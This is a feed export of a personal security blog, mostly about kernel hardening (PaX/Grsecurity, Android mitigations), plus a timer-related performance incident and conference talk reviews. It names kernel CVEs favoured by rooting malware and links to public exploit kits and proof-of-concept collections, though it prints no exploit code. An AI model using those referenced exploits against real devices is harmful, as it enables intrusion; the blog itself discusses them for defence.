tag:blogger.com,1999:blog-353459542024-02-20T07:21:29.296+08:00Hackology of CityPasswordJust keep your mind open and suck in the experience.And if it hurts,it's probably worth it.God is Love!Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.comBlogger168125tag:blogger.com,1999:blog-35345954.post-48395099552189287452016-09-15T18:00:00.000+08:002016-09-15T18:00:24.352+08:00Notes about ret2dir & PaX/GrsecurityA paper "<a href="http://www.cs.columbia.edu/~vpk/papers/ret2dir.sec14.pdf" target="_blank">ret2dir: Rethinking Kernel Isolation</a>" was released two years ago. It claimed that ret2dir can bypass <a href="https://github.com/hardenedlinux/grsecurity-101-tutorials/blob/master/kernel_mitigation.md#ret2usr-protection" target="_blank">modern mitigations including KERNEXEC/UDEREF/SMEP/SMAP/PXN</a>. The author proposed a defensive solution is called eXclusive Page Frame Ownership (XPFO) in the paper. But it was not merge into the vanilla kernel back then. Some guys are trying to <a href="http://www.mail-archive.com/linux-kernel@vger.kernel.org/msg1231010.html" target="_blank">merge it</a> again lately.<br /><br />
ret2dir might be a dramatic exploit technique can be useful to bypass mitigations. But it's not that "perfect" when it comes to <a href="http://grsecurity.net/" target="_blank">PaX/Grsecurity</a>. KERNEXEC does much more things than SMEP/PXN simply does not allow kernel code execution from userspace. I'd like to share a few things( truth?):<br /><br />1, Even under kernel <= 3.9, the kernel patched with PaX/Grsecurity can prevent ret2dir attack without enabling any features. ret2dir only works if a few highly situational conditions satisfied. More detail? Plz ask those who did the tricks;-)<br /><br />2, The fully ret2dir attack is based on PFN's information. The paper reveals two approaches to get the information: <br /><br />1) simply read the info from /proc <br />2) physmap spraying <br /><br />Unfortunately, all exploits we've found( public exploits & unpacked from malwares) are using the 1st approach in past 18 months. The evidence revealed that <a href="https://www.grsecurity.net/~spender/ekit/ret2dir/" target="_blank">all other ret2dir exploits are copycats of these two ret2dir exploit examples</a>( exploit writers aren't work hard?):<br /><br />IMOHO, ROP is the only option left for ret2dir attack. Otherwise, creating a ROP chains is not that easy on PaX/Grsecurity kernel even without RAP, isn't it?Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com4tag:blogger.com,1999:blog-35345954.post-86395621357129655202016-08-27T11:58:00.004+08:002016-10-31T15:56:57.388+08:00How can we "hardened" an Android eco-system without Google?.cn utilizes shitty firewall blocked every Google services away including Google Play and Nexus+OTA. Android phone vendors are providing their own OTA inside the .cn. For the security aspect, there are a few issues hard to solve.<br />
<br />
1) Qualcomm/Samsung/Huawei build their own BSP based on AOSP source code. If the BSP shipped without basic security mitigation, the cellphone vendors are unlikely to backport it. It will definitely be a problem to those who concerns security and privacy.<br />
<br />
2) Local small vendors upgrade so slow and some even may not have OTA. Security patches are hard to deliver in time.<br />
<br />
3) .cn doesn't have Google Play, which means tons of Android apps never been well tested by malicious check before its online for the end-user.<br />
<br />
Anyway, end-user has been suffering from the philosophy of "A-bug-is-bug". I'm going to share two stories about hardening solution. The 1st one is how I got here with help of PaX/Grsecurity's previous work. The 2nd is from Baidu( I don't talk about reputation here, not today-_-) Millions of Android phones are endangered by wilding malwares contains kernel exploits, such as <a href="http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/" target="_blank">HummingBad</a>, <a href="http://blog.trendmicro.com/trendlabs-security-intelligence/godless-mobile-malware-uses-multiple-exploits-root-devices/" target="_blank">Godless</a> and <a href="http://blogs.360.cn/360mobile/2016/06/21/analysis_of_diyuhuo/" target="_blank">Hellfire</a>( Chinese version).<br />
<br />
I'm pretty sure this is only a corner of iceberg. Organizations like underground criminals and intelligences might be use these easy-to-implement exploit to compromise those Android phone without basic mitigations. How can we still don't have ret2usr protection in 2016. Okidoki, welcome to the desert of the real;-)<br />
<br />
I was keeping my eyes on what vulnerability and exploit exist within malware or rooting tools in past 18 months. Then I figure out that some of vulnerabilities are very popular to the offensive side: CVE-2014-3153( Futex vuln), CVE-2015-3636( Pingpong root), CVE-2015-0569( Prima wifi driver) and <a href="https://github.com/dosomder/iovyroot" target="_blank">CVE-2015-1805( iovyroot)</a>.<br />
<br />
I was thinking what if there's a solution to prevent those exploit without patch anything. Then I tried to make a <a href="https://github.com/hardenedlinux/armv7-nexus7-grsec" target="_blank">prototype old Nexus device with hardened kernel</a>. I did a few things on Nexus 7 2013's kernel( repo based on Jan 2014) last year by doing a couple of things:<br />
<br />
1, Ported a PaX to flo's kernel, which is based on 3.4. Note: What I use is a relative weak version of PaX, without KERNEXEC/UDEREF/RAP and those strong Grsecurity features for x86.<br />
<br />
2, Ported PXN( armv7). Minimal memory mapping restriction might be the 1st step for ret2usr protection and PXN should be the 2nd one.<br />
<br />
3, Backport a security fix for CVE-2014-3153, which is the only one vulnerablity need to be fixed in my kernel. Because this version doesn't have UDEREF/PAN. Fortunately, Kees Cook done a backport of software-based PAN for 4.1.<br />
<br />
4, <a href="https://android.googlesource.com/kernel/common/+/19dc2c8b1ccfe130a8d2fc4093acacdf2ed1395f%5E!/" target="_blank">Prevent infoleak</a> to make exploit writer's life harder a bit.<br />
<br />
I've been using rooting tools like TOWELROOT/KINGROOT/360ROOT to test this hardened version. None of their exploits can work until last month( maybe). I've also modified some need-to-hardcoded public exploit to test and I got the same result. Well, guess it seems not bad( yet).<br />
<br />
Baidu( Google's competitor in .cn) <a href="http://conference.hitb.org/hitbsecconf2016ams/wp-content/uploads/2015/11/D1T2-Tim-Xia-Adaptive-Android-Kernel-Live-Patching.pdf" target="_blank">proposed a solution </a>a couple of months ago at HITB AMS and then release more info in <a href="http://www.droidsec.cn/%E5%9F%BA%E4%BA%8E%E8%87%AA%E9%80%82%E5%BA%94%E7%83%AD%E8%A1%A5%E4%B8%81%E7%9A%84android%E5%86%85%E6%A0%B8%E6%BC%8F%E6%B4%9E%E7%94%9F%E6%80%81%E4%BF%AE%E5%A4%8D%E6%96%B9%E6%A1%88/" target="_blank">Chinese at here</a> and <a href="https://www.blackhat.com/docs/us-16/materials/us-16-Zhang-Adaptive-Kernel-Live-Patching-An-Open-Collaborative-Effort-To-Ameliorate-Android-N-Day-Root-Exploits-wp.pdf" target="_blank">English version</a> at Black Hat USA.<br />
<br />
Unfortunately, they don't share how do they getting the root( so obviously;-)) in the 1st place. A complete steps should be like( let me know if I were wrong):<br />
<br />
1) End-user install their apps<br />
<br />
2) Rooting it via those easy-to-implement exploit( or getting it by reversing-_-)<br />
<br />
3) Insert rootkit( based on inline hook framework) & Luapatch( Policy engine) into the kernel. I'm very curious if Baidu guys co-operate with Huawei. Cu'z Luapatch is looking similar to <a href="https://github.com/ktap/ktap" target="_blank">Huawei's ktap</a>.<br />
<br />
4) Then fixing bug ...let me guess, if you have a rootkit in someone else's kernel...well, shit will happen, as always. Otherwise, the policy engine & rootkit themselves may also have vulnerabilities. It's possible that adversary( criminals/Intelligence) will act if this solution goes popular.<br />
<br />
<br />
IMOHO, I prefer the 1st way to solve the problem. But it's hard to convince vendors to merge the hardening patches. The 2nd solution may have potential risk to privacy, no one wants to have someone else's "god mode" in their cellphone, aren't they? <br />
<br />
I've been analyzing different situational hardening solution and exploit method. For the defensive aspect, I hope that making <a href="https://github.com/hardenedlinux/grsecurity-101-tutorials/blob/master/kernel_mitigation.md" target="_blank">more mitigation</a> lands into AOSP kernel. Otherwise, KSPP is another way to improve Android security. Mitigation is the way to solve those issues once for all.<br />
<br />
Update( Oct 31 2016): <a href="https://github.com/hardenedlinux/armv7-nexus7-grsec" target="_blank">Hardened PoC for Android</a> needed a backport fix for CVE-2016-5195( a.k.a "<a href="https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs" target="_blank">DirtyCOW</a>"). Cu'z it's a dangerous threat to all Android devices. There are a dozen of public PoCs, so it'd be much easier to attackers to forge their weaponized exploit to target Android devices.Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com1tag:blogger.com,1999:blog-35345954.post-26320079080608933262015-11-06T14:45:00.000+08:002015-11-06T22:55:50.395+08:00Is Linux kernel secure?I've read a article "<a href="http://www.washingtonpost.com/sf/business/2015/11/05/net-of-insecurity-the-kernel-of-the-argument/" target="_blank">Net of insecurityThe kernel of the argument</a>" from The Washington Post today. It's fuc*ing good one. I've been torturing by the security status of *stable* linux kernel for a fuc*ing long time. I never see one article can talk about the truth like this one. Many commercial customers( especially from financial data centres) has been painful to use commercial GNU/Linux products for years. Remember those 0ld good null-deref exploits and <a href="http://grsecurity.net/~spender/exploits/enlightenment.tgz" target="_blank">Enlightment framework</a> back in 2000s? What did Linus and these commercial GNU/Linux vendors response back then? They said "A bug is bug" is one thing, while SELinux can protect your asset is another. Unfortunately, they are lies to you, as always.......<br />
<br />
I'm not going to talk about those shitty history right here. You can google if you really want to know the truth. A little advice, you could start from <a href="https://slo-tech.com/clanki/10001en" target="_blank">here</a>.<br />
<br />
Well, speaking of the history of mitigation. I'm highly recommend you should go through thinkist's presentation at BH'10. Who the hell can explain the history so detailed like he did;-)<br />
<br />
<a href="https://media.blackhat.com/bh-us-10/whitepapers/Meer/BlackHat-USA-2010-Meer-History-of-Memory-Corruption-Attacks-wp.pdf" target="_blank"><span style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; display: inline !important; float: none; font-family: "arial" , "microsoft yahei"; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 23.6727px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px;">Black Hat USA 2010: Memory Corruption Attacks: The Almost Complete History</span></a><br />
<br style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; font-family: Arial, 'Microsoft YaHei'; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 23.6727px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; word-wrap: break-word !important;" />
<span style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; font-family: "arial" , "microsoft yahei"; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 23.6727px; max-width: 100%; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; word-wrap: break-word !important;">http://thinkst.com/resources/slides/bh-2010-haroon-meer-keynote.pdf</span><br />
<br style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; font-family: Arial, 'Microsoft YaHei'; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 23.6727px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; word-wrap: break-word !important;" />
<span style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; display: inline !important; float: none; font-family: "arial" , "microsoft yahei"; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 23.6727px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px;">1/5:<span class="Apple-converted-space"> </span></span><span style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; font-family: "arial" , "microsoft yahei"; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 23.6727px; max-width: 100%; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; word-wrap: break-word !important;">https://www.youtube.com/watch?v=stVz9rhTdQ8</span><br />
<span style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; display: inline !important; float: none; font-family: "arial" , "microsoft yahei"; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 23.6727px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px;">2/5:<span class="Apple-converted-space"> </span></span><span style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; font-family: "arial" , "microsoft yahei"; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 23.6727px; max-width: 100%; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; word-wrap: break-word !important;">https://www.youtube.com/watch?v=HJwg5vdoWCY</span><br />
<span style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; display: inline !important; float: none; font-family: "arial" , "microsoft yahei"; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 23.6727px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px;">3/5:<span class="Apple-converted-space"> </span></span><span style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; font-family: "arial" , "microsoft yahei"; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 23.6727px; max-width: 100%; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; word-wrap: break-word !important;">https://www.youtube.com/watch?v=5vDRCi6OQuw</span><br />
<span style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; display: inline !important; float: none; font-family: "arial" , "microsoft yahei"; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 23.6727px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px;">4/5:<span class="Apple-converted-space"> </span></span><span style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; font-family: "arial" , "microsoft yahei"; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 23.6727px; max-width: 100%; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; word-wrap: break-word !important;">https://www.youtube.com/watch?v=9edv8FwmJzk</span><br />
<span style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; display: inline !important; float: none; font-family: "arial" , "microsoft yahei"; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 23.6727px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px;">5/5:<span class="Apple-converted-space"> </span></span><span style="-webkit-text-stroke-width: 0px; background-color: white; color: #333333; font-family: "arial" , "microsoft yahei"; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 23.6727px; max-width: 100%; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; word-wrap: break-word !important;">https://www.youtube.com/watch?v=4XEe5I4Wsrc</span><br />
<br />
<br />
"As long as there is technology, there will be hackers. As long as there are hackers, there will be PHRACK magazine."( Quoted from Phrack Issue 63). As long as there are vulnerabilities, there will be exploits. As long as there are exploits, there will be mitigation.........<br />
<br />
Basically, the possible evolution of a exploitable bug should be look like this:<br />
--------------------------------------- <br />
Bug –> exploitable bug(vulnerability) –> poc –> exploit –> reliable/weaponized exploit<br />
---------------------------------------<br />
<br />
That's where the problem comes. There are two types of philosophical ideas about how to deal with exploitable bug.<br />
<br />
1, Linus Torvalds represent the philosophy of "A bug is bug", which believes any exploitable bug should be taken care of like the normal bug. When one is being found, just get to fix it. Any security mitigation is fully waste of CPU usage. Developers should've only focus on the features and performance. He( and his followers) even believes bug info's obscurity is the way to prevent attacker and "security through obscurity" is an effective approach for Linux kernel upstream.<br />
<br />
2, <a href="http://pax.grsecurity.net/" target="_blank">PaX Team</a> and <a href="http://grsecurity.net/" target="_blank">spender</a> are the most fascinating guys on the side of security mitigation. They( I) believes numerous exploitable bugs can not be solved once for all by fixing them. But we can design some specific security mitigation to against the specific types of vulnerabilities. That's the only way to solve this issue.<br />
<br />
Well, those two philosophical ideas are totally different. Why the hell happens? IMOHO, one of main reasons is the threat model is totally different. In my own adversary, the attackers may have the weaponized exploits, which developed by digital armory( Vupen, HT?) or underground. While only the skiddies in Linus's threat model( it seems to be at least;-)).<br />
<br />
Some commercial GNU/Linux vendors basically believes public exploit is the most important reason to influence their risk assessment. Don't believe that? <a href="https://securityblog.redhat.com/2015/04/08/dont-judge-the-risk-by-the-logo/" target="_blank">They admitted by themselves</a>;-)<br />
<br />
A lot of my customers always says one of reasons they choose GNU/Linux as their alternatives of UNIX, because GNU/Linux is secure. I've been wondering all the time and response like "ARE U fuc*ing serious?". Now GNU/Linux is dive into the next age of Internet, which some people would like to call IoT( internet of the things). But the question is: Is Linux kernel ready to face the tons of cybercriminals? You fuc*ing tell me........<br />
<br />
btw: Kernel/Compiler/Firmware are very important core infrastructures of modern cyber world. A lot of good people are busy to defend our world by their effort. <a href="http://grsecurity.net/" target="_blank">PaX/Grsecurity</a> guys are my heros. <a href="https://wiki.debian.org/ReproducibleBuilds" target="_blank">Reproducible builds</a>( based on the theory of <a href="http://www.dwheeler.com/trusting-trust/dissertation/html/wheeler-trusting-trust-ddc.html" target="_blank">DDC, by David A. Wheeler</a>) is definitely gonna piss NSA off. <a href="http://chipsec/" target="_blank">CHIPSEC</a>( for firmware) may be the starting point. I do believe only the fined FOSS solution can make this world a little more secure......Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com2tag:blogger.com,1999:blog-35345954.post-50368095375423502762015-07-12T23:12:00.001+08:002015-07-12T23:12:59.359+08:00Damn, the disclosure of PRISM cost my money;-)Time is running on. It's been about two years after Mr.Sn0wden made the 1st disclosure of those documents back in June 2013. Everybody was shocked back then. In security/hacker community, those news about what BIG BROTHER did to us was nothing new. Guess most people already knew it. But what Mr.Sn0wden brings us, is to confirm the details about how BIG BROTHER has been doing the shit. More importantly, it has educational purposes for the public. The whole world is fuc*ing changed, because of PRISM disclosure. People( I mean crypto-anarchist, professional paranoia, etc) think differently from then. To myself( as a FOSS cybersecurity dude), the PRISM definitely changed my life.<br />
<br />
I kept reading some astonishing news about leaked documents back in July 2013 and thought a lot during the period of oSC2013 at a beautiful city nearby Aegean Sea. "What should I do about it? Should I get involve with something? What kind of philosophical ideas can better fit in post-prism era?" and so on..these questions I asked myself many times. Then I was thinking ...... <br />
<br />
1, Philosophical level. Well, free software philosophy would be the same to me since 2007. The concept of free/libre is more important than ever before. In post-prism era, BIG BROTHER and big corps are too powerful to restrict the individual freedom in digital world. Although we've won the war between open vs. closed. But many people still misunderstand about the <a href="http://www.gnu.org/philosophy/free-software-for-freedom.en.html" target="_blank">differences between free software and open source</a>. IMOHO, support FSF( Free Software Foundation) will always be on my TODO.<br />
<br />
2, Technical level. Many researches reveal that open system is more secure than closed one. Btw, <a href="http://citypw.blogspot.com/2013/12/life-was-never-easyespecially-in-post.html" target="_blank">Bruce Schneier agrees with that</a>. After all these years, I finally realize there are two powerful weapons we can use to against the enemy: System security & Cryptography. Some people only focus on crypto and OS level security is totally missing, which might cause a failure. It's like building a fortress upon the sand. Some 0ld sch00l hackers criticised about it last year. In the practical cases to GNU/Linux users, PaX/Grsecurity is the only option we have.<br />
<br />
3, Law level. Speak of law & public education, EFF has been doing the great work in past two decades. Why would I support EFF? The reason is so simple: They speak for me, or they speak for the type of person like me.<br />
<br />
I did the math a little bit today and found out I've donated around $5800 to the FOSS community including <a href="http://www.fsf.org/" target="_blank">FSF</a>, <a href="https://www.eff.org/" target="_blank">EFF</a>, <a href="https://www.debian.org/" target="_blank">Debian</a>, <a href="https://wiki.debian.org/Mempo" target="_blank">Mempo</a>, <a href="https://grsecurity.net/" target="_blank">PaX/Grsecurity</a>, <a href="http://hardenedlinux.org/" target="_blank">HardenedLinux</a>, <a href="http://hardenedbsd.org/" target="_blank">HardenedBSD</a> since the disclosure of PRISM. I'm not trying to convince anyone to donate money to any organizations here. But I'm encouraging you to think for yourself, about why are you here reading my fuc*ing annoying & noisy blog? Does free software matters to you? Or don't you think is worth supporting about what EFF is doing?<br />
<br />
Long live 0ld sch00l!<br />
Long live anarchy!Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com1tag:blogger.com,1999:blog-35345954.post-72881460112572489082015-04-09T00:52:00.002+08:002015-04-09T00:52:27.956+08:00Debian GNU/Linux security checklist and hardeningThe 1st time I met Debian GNU/Linux was about a decade ago when I was a college dude. Stupid college life was too boring back then;-) It was almost the same time I met Phrack ezine in my 1st time. Damn, time is running on...<br />
<br />
Anyway, I'd like to share this article "<a href="https://raw.githubusercontent.com/citypw/DNFWAH/master/5/d5_0x02_DNFWAH_debian_gnu-linux_security_chklist_hardening.txt" target="_blank">Debian GNU/Linux security checklist and hardening</a>" with you guys. H0pe you can find your peace in this pathetic era;-) Yeah..yeah..I just wanna say: "Phrack is not dead, PaX/Grsecurity is not dead, DNFWAH is not dead, 0ld sch00l is not dead, the Underground spirit is not dead.....If they were, that'd be on us!!!".Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com0tag:blogger.com,1999:blog-35345954.post-68702750954421438402015-03-17T23:53:00.003+08:002015-03-17T23:53:48.456+08:00HIGHRES TIMER can be your DoS nightmare<pre>This is a real-life story about <span style="color: lime;">HIGH RESOLUTION TIMER</span> and how lame
coders use it to make a self-DoS;-) You should be very cautions if
your system was written by those type of coders.
Incident happened:
1, A dozen of RHEL 6 GNU/Linux servers were extremely slow while
running some *** applications. The kernel CPU usage was about
40%--50%.
2, the "free" item from vmstat was not seems OK. "free" was keep
increasing but "buff" & "cache" were decreasing when a bunch of data
went through. Then kernel gave you a *hint* about OOM( Out of Memory):
"kernel panic - not syncing: Out of memory and no killable processes..."
Then kernel tried to kill each processes until shit happened, which
was kernel panic.
I began this investigation with strace. The result was quite
strange. Why would the application( malware?) invoke the syscall
nanosleep() so often? Every <span style="color: red;">10000ns</span>( 10us)? Seriously? All I can tell
is the application doesn't need to do real time work.
--------------------------------------------------------------
<span style="color: red;">15:30:08.002047 nanosleep({0, 10000}, NULL) = 0 <0 .000082="">
15:30:08.002175 nanosleep({0, 10000}, NULL) = 0 <0 .000074="">
15:30:08.002297 nanosleep({0, 10000}, NULL) = 0 <0 .000074="">
...
15:30:09.917557 nanosleep({0, 10000}, NULL) = 0 <0 .000075="">
15:30:09.917661 nanosleep({0, 10000}, NULL) = 0 <0 .000071=""></0></0></0></0></0></span>
--------------------------------------------------------------
The customer said it was never happened in 0ld good GNU/Linux systems(
like RHEL 5). My guts hints me to a direction: High Resolution
Timer. A type of kernel timer that can provide more accurate time
measure. I've read <a href="http://man7.org/linux/man-pages/man7/time.7.html" target="_blank">Linux Manual</a> and very well explained <a href="https://www.kernel.org/doc/Documentation/timers/hrtimers.txt" target="_blank">kernel doc</a> and </pre>
<pre>learned that HIGHRES TIMER was added to the upstream code in
2.6.21. So I guess..just guess..some lazy & lame coders just want to
make the program "sleep" in a very "short" time. Then he/she wrote
this code very confidently:
usleep(10);
If you're running linux kernel before 2.6.21, this line of code will
only sleep between 1ms and 2ms. But..annoying *but* is coming..if
you're running *modern* GNU/Linux distro with HIGHRES support, the
same code will sleep 10us, which might cause performance hit. CentOS
community had the <a href="http://unix.stackexchange.com/questions/37391/high-cpu-usage-with-cfs" target="_blank">similar issue</a> before:
From the evidence we have, there are two clues might lead us to the
crime-scene: High Resolution Timer.
1, nanosleep() has been invoked >=8k times in every fuc*ing second.
2, The victim kernel was not running with kdump. But we still have
some kernel logs. According to the CallTrace, the kernel was playing
with HIGHRES-related context should not be a coincidence:
[<ffffffff810d182e>] ? audit_syscall_exit+0x27e/0x290
[<ffffffff8100b2a4>] ? sysret_audit+0x16/0x20
[<ffffffff81092ff3>] ? __hrtimer_start_range_ns+0x1a3/0x460
[<ffffffff8100b2a4>] ? sysret_audit+0x16/0x20
[<ffffffff8100b2a4>] ? sysret_audit+0x16/0x20
[<ffffffff810cea0d>] ? audit_filter_rules+0x2d/0xa10
[<ffffffff810d182e>] ? audit_syscall_exit+0x27e/0x290
[<ffffffff8100b2a4>] ? sysret_audit+0x16/0x20
schedule_timeout: wrong timeout value ffffffffffffb572
Solution:
I'm giving you two options:
1, Modify the source code( if you have) about *sleep*-related
functions and tell the fuc*ing coders they can go home and fuck
themselves.
2, Append "<span style="color: #3d85c6;">nohz=off highres=off</span>" to the file /etc/grub.conf, to turn
it fuc*ing off this feature.
Testing result:
Unfortunately, we had to test this in a production system..but we did
it.
+-----------------------------------------------+
| Item | HIGHRES ON | HIGHRES OFF |
+-----------------------------------------------+
| nanosleep | >8,000 times | 345 times |
+-----------------------------------------------+
| buff/cache| Decreasing | Increasing |
+-----------------------------------------------+
| %sys | 50% | 6% |
+-----------------------------------------------+
Well, I guess we arrested the *perpetrator* this time. Damn...not every </ffffffff8100b2a4></ffffffff810d182e></ffffffff810cea0d></ffffffff8100b2a4></ffffffff8100b2a4></ffffffff81092ff3></ffffffff8100b2a4></ffffffff810d182e></pre>
<pre>business impact caused by security issues;-)</pre>
Anonymoushttp://www.blogger.com/profile/13974563038012930535noreply@blogger.com0tag:blogger.com,1999:blog-35345954.post-16319227588254151272015-01-03T01:48:00.002+08:002015-01-03T01:48:20.239+08:00Happy New Year 2015Time is running on and brings us to another new year. Does this fuc*ing mean another fight? I've been sitting on my butt and watching a lot of presentations of 31C3. Unfortunately, I couldn't be there physically. I'm fuc*ing jealous you guys who were there;-)<br />
<br />
I've learned a lot from these videos. So, I'd like to write down what I thought about some great topics.<br />
<br />
<span style="color: #3d85c6;"><span style="font-size: large;">31C3 Opening Event [31c3] mit Erdgeist und Geraldine de Bastion</span> </span><br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/qBsK3mzPdNM?feature=player_embedded' frameborder='0'></iframe></div>
Nothing I can say about opening;-)<br />
<br />
<br />
<span style="font-size: large;"><span style="color: #3d85c6;">Jacob Appelbaum: Reconstructing narratives - transparency in the service of justice</span></span><br />
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/0SgGMj3Mf88?feature=player_embedded' frameborder='0'></iframe><br />
This is the most fuc*ing awesome presentation I've seen in 2014 since I watched Jacob's free speech on last C3 conference. Yes..what I've been trying to tell people( friends & customers) that only a few things we may rely on: OTR, PGP, SSL/TLS with PFS... This is a very positive message that not everything is being fucked. Well... IMOHO, only taking crypto itself into account is not enough. Kernel hardening should be a must-need stuff more than ever before. A lot of 0ld sch00l guys are complaining about people are still not taking serious about system-lvl security( <a href="https://grsecurity.net/" target="_blank">PaX/Grsecurity</a>? <a href="https://qubes-os.org/" target="_blank">QubeOS</a>? <a href="http://www.openmirage.org/" target="_blank">Mirage OS</a>?) after EFF released the security guideline. Even the <a href="http://www.tcij.org/resources/handbooks/infosec" target="_blank">Information Security for Journalists</a> focuses on crypto in the most part......damn...I think there are a lot of interesting stuff we could try in 2015.............<br />
<br />
<span style="color: #3d85c6;"><span style="font-size: large;">SS7map : mapping vulnerability of the international mobile roaming infrastructure [31c3] </span></span><br />
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/SfPC9IHCW-U?feature=player_embedded' frameborder='0'></iframe><br />
Well done, P1Sec guys! Telco security is not my major focus, but I've been learning CORENET stuff from some friends in last a few years. According to the <a href="http://ss7map.p1sec.com/" target="_blank">ss7map</a>, China is one of country has high risk in CORENET. Guess a huge consulting market is out there;-)<br />
<br />
<br />
<span style="color: #3d85c6;"><span style="font-size: large;">The Cloud Conspiracy 2008-2014 [31c3] </span></span><br /><span id="goog_1778790532"></span><span id="goog_1778790533"></span><br />
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/ijr0E6Lw4Nk?feature=player_embedded' frameborder='0'></iframe><br />Everybody are talking about the cloud. Cloud might help small startup( don't have sensitive data) in many aspects, especially on cost issue. But..speak of cloud security, damn..I'm gonna speak it out: The security of public cloud is a joke, the security of private cloud is a fraud;-)<br /><br /><span style="color: #3d85c6;"><span style="font-size: large;">Trustworthy secure modular operating system engineering</span></span><br />
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/4X0WjSqiIPs?feature=player_embedded' frameborder='0'></iframe><br />Building trust-chains within compartment/containment is not a bad idea for defense in depth. "What you're doing is wrong" is a common phrase from hacker community. But how to do it right is a scientific problem;-) I don't think typed-safe language will be a silver-bullet. New issues and snake-oil security product always comes out. People will be happy to talk about how "Next-Gen" technology gonna change the future...unfortunately, they have no idea what the fuc* they talk about( in most cases). Why would the fuc*ing industry needs "Next-Gen" technology? I guess, no one wants talk about what the hell was the Last-Gen tech;-)<br />
<br />
<span style="color: #3d85c6;"><span style="font-size: large;">SS7: Locate. Track. Manipulate. </span></span><br />
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/lQ0I5tl0YLY?feature=player_embedded' frameborder='0'></iframe><br />
Wow..very good work, Tobias! I was so exciting when you show up the demo. CORENET is really interesting and amazing. That reminds me a saying from Captain: "The phone company is nothing but a computer... A computer is a System...". Ohh, did I say "cloud"?<br />
<br />
<br /> <br />
<h1 class="yt" id="watch-headline-title">
<span style="color: #3d85c6;"><span style="font-size: large;"><span class="watch-title long-title" dir="ltr" id="eow-title" title="Switches Get Stitches - Industrial System Ownership [31c3]">Switches Get Stitches - Industrial System Ownership </span></span></span></h1>
